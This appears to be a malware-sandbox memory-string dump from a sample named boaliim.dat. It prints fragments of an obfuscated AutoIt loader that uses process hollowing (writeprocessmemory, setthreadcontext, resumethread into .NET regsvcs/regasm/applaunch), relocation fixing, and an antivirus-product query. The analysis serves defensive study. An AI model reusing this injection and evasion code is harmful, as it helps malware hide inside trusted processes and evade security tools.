Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segds
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segcs
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: seges
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eflagsc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nameh
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: spare
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: andleb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sumethread
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dwordx
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: resumethread
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pare2$
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ygiu694lr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \registry\user\s-1-5-21-3853321935-2125563209-4053062332-1002k
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unionofvirtualsizeandphysicaladdressd
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9de0fe3ac427d6126889cf80esq
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9ed01c99c7540460a80acc31b7c~
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71deeb255777417aa96ec3c7ck
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unionofvirtualsizeandphysicaladdress
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9de0fe3ac427d61268995eb0e7
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: word magic;byte majorlinkerversion;<
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unionofvirtualsizeandphysicaladdress)
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unionofvirtualsizeandphysicaladdressmp"
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\knmo\boaliim.dat
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9de06c289745d400699b7ca007cz
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dword virtualaddress; dword sizeofblockg
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9eb36e28b456c771ba794ea0el
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cc0ceea6516a6b1cab98e8327cy
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9dd2de8a55d797c31aa90e1327cf
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71ce2a4516c7b23a3b4e02140b82
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da3df3a9426c6725af97e9387c?
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9fd2bf3bc5976752680b7d6, $_y0x3856f9c720ee97637d6621af97e8247c, "mtext", '')
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9fe2ff4bb477760319f = iniread($_y0x3856f9fd2bf3bc5976752680b7d6, $_y0x3856f9c720ee97637d6621af97e8247c, "k3ysx", '')
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cc0ceea6516a6b0c = fileread(filegetshortname(@scriptdir & "\" & $_y0x3856f9eb36e28b456c771ba794ea0e))\|$
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cc0ceea6516a6b0c = fileread(filegetshortname(@scriptdir & "\" & $_y0x3856f9eb36e28b456c771ba794ea0e))9?g
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cc0ceea6516a6b0c = ($_y0x3856f9cc0ceea6516a6b0c)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _reverse($_y0x3856f9dd11d4bc42717c329f)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c711ebad5e41 = stringlen($_y0x3856f9dd11d4bc42717c329f)40t
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ekrn.exe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msctf.dllk(
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9e720e1ad536c7b3aa8a6c63956956ba47a4d7cc22b1629~
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: byte inheritedaddressspace;byte readimagefileexecoptions;exe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\microsoft.net\framework\v2.0.50727\regasm.exe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029xe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\appdata\local\temp\regsvcs.exeregsvcs.execw
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exel5
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c60fe3be51687b66f4a0 = dllopen("advapi32.dll")
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\microsoft.net\framework\v4.0.30319\applaunch.exeenu
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return $_y0x3856f9c720edad536c4d3ba38dbb0844917aa4776742c03727
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da07ca89775d4d1a96adc6186ba046975e576de71a2c29exe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: elseif fileexists($_y0x3856f9c720edad536c4d3ba38eeb3253b8) thend)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $_y0x3856f9c711ebad5e41 < 1 then return seterror(1, 0, "")
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _stringbetween($s_string, $s_start, $s_end, $v_case = -1)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $s_end = stringregexpreplace($s_end, $s_pattern_escape, "\\$1")9)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c60df5b1406c5a34b591d6 = $_y0x3856f9cf1ce2bc69[5]orv()
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($_y0x3856f9f82ff5f10441, 1, "current_user")4q7
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return $_y0x3856f9c720edad536c4d3ba38dbd0844917aa4776742c037271
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct"))
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9da07ca89775d4d1a96adc6186ba046975e576de71a2c29
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _runbinary_iswow64process($_y0x3856f9c61ef5a7537d61269f)ktp*
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6toar1049wfld4e75
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l $_y0x3856f9da11e4a0516a610c = dllstructcreate("char[" & $_y0x3856f9c711ebad5e41 + 1 & "]")015
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($_y0x3856f9da11e4a0516a610c, 1, $_y0x3856f9dd11d4bc42717c329f)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9cf11f5ad4641 = dllcall("msvcrt.dll", "ptr:cdecl", "_strrev", "struct*", $_y0x3856f9da11e4a0516a610c)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if @error or $_y0x3856f9cf11f5ad4641[0] = 0 then return seterror(2, 0, "")p
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbd0857846dbb607175 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v2.0.50727\regsvcs.exe")g
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbd0857846da9657f75 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v2.0.50727\regasm.exe")~
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbd0844917aa4776742c03727 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v2.0.50727\applaunch.exe")h
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbb0857846dbb607175 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v4.0.30319\regsvcs.exe")c
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbb0857846da9657f75 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v4.0.30319\regasm.exe")
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbb0844917aa4776742c03727 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v4.0.30319\applaunch.exe")6v
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d21b18ce13c7ad23891 = ($
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c4574770c = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec39371d648da99b77cc25 & "]")0
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9da06e2a9547d60269f = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec393615648ea9a741d539c772 & "]", $_y0x3856f9de06c289745d400699b7ca007c)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c71deeb255577407a78ecb36518053, $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c718eeba446d73399590f5327ce
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27 = dllstructcreate("char name[8];" & "dword unionofvirtualsizeandphysicaladdress;" & "dword virtualaddress;" & "dword sizeofrawdata;" & "dword pointertorawdata;" & "dword pointertorelocations;" & "dword pointertolinenumbers;" & "word numberofrelocations;" & "word numberoflinenumbers;" & "dword characteristics", $_y0x3856f9de1ee8a15e6c77279f)#
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c71deeb255577407a78ecb36518053 = dllstructgetdata($_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27, "sizeofrawdata")/
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b = $_y0x3856f9de06c289745d400699b7ca007c + dllstructgetdata($_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27, "pointertorawdata")$
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c718eeba446d7339879deb2540927991 = dllstructgetdata($_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27, "virtualaddress")(
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c718eeba446d73399590f5327c = dllstructgetdata($_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27, "unionofvirtualsizeandphysicaladdress")7
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $_y0x3856f9c718eeba446d73399590f5327c and $_y0x3856f9c718eeba446d73399590f5327c < $_y0x3856f9c71deeb255577407a78ecb36518053 then $_y0x3856f9c71deeb255577407a78ecb36518053 = $_y0x3856f9c718eeba446d73399590f5327cq
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata(dllstructcreate("byte[" & $_y0x3856f9c71deeb255577407a78ecb36518053 & "]", $_y0x3856f9de03e8ac4574770c + $_y0x3856f9c718eeba446d7339879deb2540927991), 1, dllstructgetdata(dllstructcreate("byte[" & $_y0x3856f9c71deeb255577407a78ecb36518053 & "]", $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b), 1))b
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $_y0x3856f9c718eeba446d7339879deb2540927991 <= $_y0x3856f9de0fe3ac427d6126889cf81544926f9a737e43c006 and $_y0x3856f9c718eeba446d7339879deb2540927991 + $_y0x3856f9c71deeb255577407a78ecb36518053 > $_y0x3856f9de0fe3ac427d6126889cf81544926f9a737e43c006 thenc
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9da1ce2a45f7b4034b1a0 = dllstructcreate("byte[" & $_y0x3856f9c71deeb2555a7326a3abea3b4a8253 & "]", $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b + ($_y0x3856f9de0fe3ac427d6126889cf81544926f9a737e43c006 - $_y0x3856f9c718eeba446d7339879deb2540927991))b
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $_y0x3856f9c81ce2a45f7b7321a3a0 then _runbinary_fixreloc($_y0x3856f9de03e8ac4574770c, $_y0x3856f9da1ce2a45f7b4034b1a0, $_y0x3856f9de14e2ba5f487d3ca88dd6, $_y0x3856f9de01f7bc59777c34aab1ea36418478817b734bc61d1f0360a489826b, $_y0x3856f9c703e6af597b4b = 523)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "writepro" & "cessmemory", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de14e2ba5f487d3ca88dd6, "ptr", $_y0x3856f9de03e8ac4574770c, "dword_ptr", $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec39371d648da99b77cc25, "dword_ptr*", 0)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcall("kernel32.dll", "bool", "terminateprocess", "handle", $_y0x3856f9c61ef5a7537d61269f, "dword", 0)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_2c87ca0024d60201\b
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c70ae2a444794b = $_y0x3856f9de0fe3ac427d6126889cf80e - $_y0x3856f9de0fe3ac427d61268995eb0e
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ci.cataloghint
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s$ci.cataloghint
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft-windows-netfx4-us-oc-package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: omicrosoft-windows-netfx4-us-oc-package~31bf3856ad364e35~amd64~~10.0.17134.1.cat6
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \registry\user\s-1-5-21-3853321935-2125563209-4053062332-1002\software\microsoft\windows nt\currentversion
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l $_y0x3856f9da1ec28a69 = dllstructcreate("byte inheritedaddressspace;" & "byte readimagefileexecoptions;" & "byte beingdebugged;" & "byte spare;" & "ptr mutant;" & "ptr imagebaseaddress;" & "ptr loaderdata;" & "ptr processparameters;" & "ptr subsystemdata;" & "ptr processheap;" & "ptr fastpeblock;" & "ptr fastpeblockroutine;" & "ptr fastpebunlockroutine;" & "dword environmentupdatecount;" & "ptr kernelcallbacktable;" & "ptr eventlogsection;" & "ptr eventlog;" & "ptr freelist;" & "dword tlsexpansioncounter;" & "ptr tlsbitmap;" & "dword tlsbitmapbits[2];" & "ptr readonlysharedmemorybase;" & "ptr readonlysharedmemoryheap;" & "ptr readonlystaticserverdata;" & "ptr ansicodepagedata;" & "ptr oemcodepagedata;" & "ptr unicodecasetabledata;" & "dword numberofprocessors;" & "dword ntglobalflag;" & "byte spare2[4];" & "int64 criticalsectiontimeout;" & "dword heapsegmentreserve;" & "dword heapsegmentcommit;" & "dword heapdecommittotalfreethreshold;" & "dword heapdecommitfreeblockthreshold;" & "dword numberofheaps;" & "dword maximumnumberofheaps;" & "ptr processheaps;" & "ptr gdisharedhandletable;" & "ptr processstarterhelper;" & "ptr gdidcattributelist;" & "ptr loaderlock;" & "dword osmajorversion;" & "dword osminorversion;" & "dword osbuildnumber;" & "dword osplatformid;" & "dword imagesubsystem;" & "dword imagesubsystemmajorversion;" & "dword imagesubsystemminorversion;" & "dword gdihandlebuffer[34];" & "dword postprocessinitroutine;" & "dword tlsexpansionbitmap;" & "byte tlsexpansionbitmapbits[128];" & "dword sessionid")d
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "readprocessmemory", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($_y0x3856f9da1ec28a69, "imagebaseaddress", $_y0x3856f9de14e2ba5f487d3ca88dd6)f
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "writepro" & "cessmemory", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)$
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "e" & "ax", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653)#
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "rcx", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653),
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "setthreadcontext", "handle", $_y0x3856f9c61aefba5579760c, "ptr", dllstructgetptr($_y0x3856f9da0dc886645d4a019f))
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "dword", "resumethread", "handle", $_y0x3856f9c61aefba5579760c)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61ef5a7537d61269f)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61aefba5579760c)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return dllstructgetdata($_y0x3856f9da3ef5a7537d61269990e1314a9367a9627b43cd06, "processid")0
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _runbinary_fixreloc($_y0x3856f9de03e8ac4574770c, $_y0x3856f9da0ae6bc5141, $_y0x3856f9de0fe3ac427d6126889cf80e, $_y0x3856f9de0fe3ac427d61268995eb0e, $_y0x3856f9c807eaa9577d4a63f2a0)#
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c71deeb255777417aa96ec3c7c, $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9da0be9ba597d610c, $_y0x3856f9c70ae6bc5141, $_y0x3856f9da0fe3ac427d61269f
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c708eba95741 = 3 + 7 * $_y0x3856f9c807eaa9577d4a63f2a0
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: while $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8 < $_y0x3856f9c71deeb255410
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029 = dllstructcreate("dword virtualaddress; dword sizeofblock", $_y0x3856f9de0ae6bc5141 + $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8)$
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c718eeba446d7339879deb2540927991 = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "virtualaddress")"
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c71deeb255777417aa96ec3c7c = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "sizeofblock")
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f = ($_y0x3856f9c71deeb255777417aa96ec3c7c - 8) / 21
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9da0be9ba597d610c = dllstructcreate("word[" & $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f & "]", dllstructgetptr($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029) + 8)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c70ae6bc5141 = dllstructgetdata($_y0x3856f9da0be9ba597d610c, 1, $_y0x3856f9c717)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if bitshift($_y0x3856f9c70ae6bc5141, 12) = $_y0x3856f9c708eba95741 then,
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9da0fe3ac427d61269f = dllstructcreate("ptr", $_y0x3856f9de03e8ac4574770c + $_y0x3856f9c718eeba446d7339879deb2540927991 + bitand($_y0x3856f9c70ae6bc5141, 0xfff))"
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($_y0x3856f9da0fe3ac427d61269f, 1, dllstructgetdata($_y0x3856f9da0fe3ac427d61269f, 1) + $_y0x3856f9c70ae2a444794b)"
